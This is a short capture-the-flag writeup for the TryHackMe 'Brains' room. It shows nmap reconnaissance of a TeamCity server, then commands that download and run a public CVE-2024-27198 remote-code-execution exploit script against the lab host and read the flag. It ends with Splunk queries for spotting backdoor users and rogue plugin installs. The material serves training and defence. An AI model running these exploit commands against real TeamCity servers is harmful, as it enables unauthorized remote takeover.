Post

TryHackMe Brains Writeup

Posted
By x3ric
1 min read

Explore the fundamentals of cybersecurity in the Brains Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.4.11 brains.thm

Script to add hosts automatically

1
2
3

ip="10.10.4.11"
domain="brains.thm"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV brains.thm

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

Nmap scan report for brains.thm (10.10.4.11)
Host is up (0.068s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 10:6e:04:57:87:92:95:45:7b:ab:41:5a:c0:fa:e2:df (RSA)
|   256 77:f7:0f:b1:b2:69:b6:14:27:41:cc:ad:db:45:34:13 (ECDSA)
|_  256 5f:79:66:d8:2c:c3:8c:e0:38:2a:7a:aa:2a:16:1a:10 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Maintenance
50000/tcp open  http    Apache Tomcat (language: en)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: TeamCity Maintenance — TeamCity
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Login Details

URL: http://brains.thm:50000/login.html

JetBrains Version: 2023.11.3 (build 147512)

CVE-2024-27198

GitHub Repository for CVE-2024-27198 Exploit

To use the exploit, you can download and run the Python script from the repository:

1
2
3

wget https://raw.githubusercontent.com/W01fh4cker/CVE-2024-27198-RCE/refs/heads/main/CVE-2024-27198-RCE.py
python3 CVE-2024-27198-RCE.py -t "http://brains.thm:50000/"
rm -rf CVE-2024-27198-RCE.py

After running the exploit, you might want to check for the output or the flag:

1

cat /home/ubuntu/flag.txt

Blue Team Defensive Monitoring

After launching the new machine instance, wait approximately 5 minutes to ensure the machine has fully started.

Monitoring Endpoint:

  • URL: http://10.10.24.83:8000/en-US/app/search/search

Investigation Queries

  1. Backdoor User Creation: Query the authentication logs to identify any unauthorized user creation events:
    1

    source="/var/log/auth.log" *useradd*
  2. Suspicious Package Installation: Check the package manager logs for any unexpected installations on July 4:
    1

    source="/var/log/dpkg.log" date_month="july" date_mday="4" *install*
  3. Plugin Installation: Review the TeamCity server logs for any new plugin installations:
    1

    source="/opt/teamcity/TeamCity/logs/teamcity-activities.log" *plugin*
ctf
thm cft writeup linux cve-2024-27198
This post is licensed under CC BY 4.0 by the author.